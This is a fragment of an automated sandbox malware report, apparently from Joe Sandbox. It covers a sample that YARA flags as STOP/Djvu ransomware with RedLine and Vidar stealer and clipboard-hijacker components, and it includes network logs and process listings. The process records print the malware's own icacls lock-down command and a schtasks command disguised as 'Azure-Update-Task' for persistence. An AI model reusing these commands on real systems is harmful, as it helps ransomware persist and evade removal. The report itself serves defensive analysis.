Nov 30, 2022 00:22:19.021750927 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.021878004 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.021920919 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.021985054 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.021986008 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.022032976 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.022056103 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.022083998 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.022130966 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.022201061 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.316337109 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.316379070 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.316396952 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.316416025 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.316667080 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.316667080 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.316993952 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317049980 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317094088 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317120075 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.317167997 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317214966 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.317276001 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317364931 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.317444086 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317487955 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317508936 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.317549944 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.317610025 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317665100 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.317768097 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317805052 CET	80	49705	116.121.62.237	192.168.2.5
Nov 30, 2022 00:22:19.317894936 CET	49705	80	192.168.2.5	116.121.62.237
Nov 30, 2022 00:22:19.612457991 CET	80	49705	116.121.62.237	192.168.2.5

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2022 00:22:09.378216028 CET	61893	53	192.168.2.5	8.8.8.8
Nov 30, 2022 00:22:09.401011944 CET	53	61893	8.8.8.8	192.168.2.5
Nov 30, 2022 00:22:16.162992954 CET	60649	53	192.168.2.5	8.8.8.8
Nov 30, 2022 00:22:16.184927940 CET	53	60649	8.8.8.8	192.168.2.5
Nov 30, 2022 00:22:16.657289028 CET	51441	53	192.168.2.5	8.8.8.8
Nov 30, 2022 00:22:16.671861887 CET	49177	53	192.168.2.5	8.8.8.8
Nov 30, 2022 00:22:16.689538002 CET	53	49177	8.8.8.8	192.168.2.5
Nov 30, 2022 00:22:16.839822054 CET	53	51441	8.8.8.8	192.168.2.5
Nov 30, 2022 00:22:30.252228975 CET	49724	53	192.168.2.5	8.8.8.8
Nov 30, 2022 00:22:30.271348953 CET	53	49724	8.8.8.8	192.168.2.5
Nov 30, 2022 00:22:30.948734999 CET	61452	53	192.168.2.5	8.8.8.8
Nov 30, 2022 00:22:30.970451117 CET	53	61452	8.8.8.8	192.168.2.5
Nov 30, 2022 00:22:34.384795904 CET	65323	53	192.168.2.5	8.8.8.8
Nov 30, 2022 00:22:34.407268047 CET	53	65323	8.8.8.8	192.168.2.5
Nov 30, 2022 00:22:41.460248947 CET	51484	53	192.168.2.5	8.8.8.8
Nov 30, 2022 00:22:41.477461100 CET	53	51484	8.8.8.8	192.168.2.5

Target ID:	0
Start time:	00:22:04
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\U59WtZz2Sg.exe
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.304747895.000000000218B000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Target ID:	1
Start time:	00:22:07
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\U59WtZz2Sg.exe
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.302933053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.301522504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Target ID:	2
Start time:	00:22:10
Start date:	30/11/2022
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls "C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Imagebase:	0x1190000
File size:	29696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Target ID:	5
Start time:	00:22:12
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\U59WtZz2Sg.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000000.314511925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000000.313991274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Target ID:	6
Start time:	00:22:15
Start date:	30/11/2022
Path:	C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe --Task
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.321377469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.322799276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Target ID:	7
Start time:	00:22:23
Start date:	30/11/2022
Path:	C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.350733876.0000000002105000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.351892792.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.351892792.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Target ID:	9
Start time:	00:22:26
Start date:	30/11/2022
Path:	C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.343989029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.347232318.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Target ID:	10
Start time:	00:22:27
Start date:	30/11/2022
Path:	C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe"
Imagebase:	0x400000
File size:	264192 bytes
MD5 hash:	B9212DED69FAE1FA1FB5D6DB46A9FB76
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000000.378213612.0000000000627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000000.347600742.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000000.369240104.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000000.347031103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000000.347942903.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000000.347322735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Target ID:	15
Start time:	00:22:29
Start date:	30/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Imagebase:	0x340000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Target ID:	16
Start time:	00:22:33
Start date:	30/11/2022
Path:	C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\439dd104-1941-4ae6-af5f-8afc23993f7a\U59WtZz2Sg.exe" --AutoStart
Imagebase:	0x400000
File size:	680448 bytes
MD5 hash:	41001FDD7879CE9EDE214E92C7E492BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.373204030.00000000020F3000.00000040.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.378615646.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000002.378615646.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

Target ID:	17
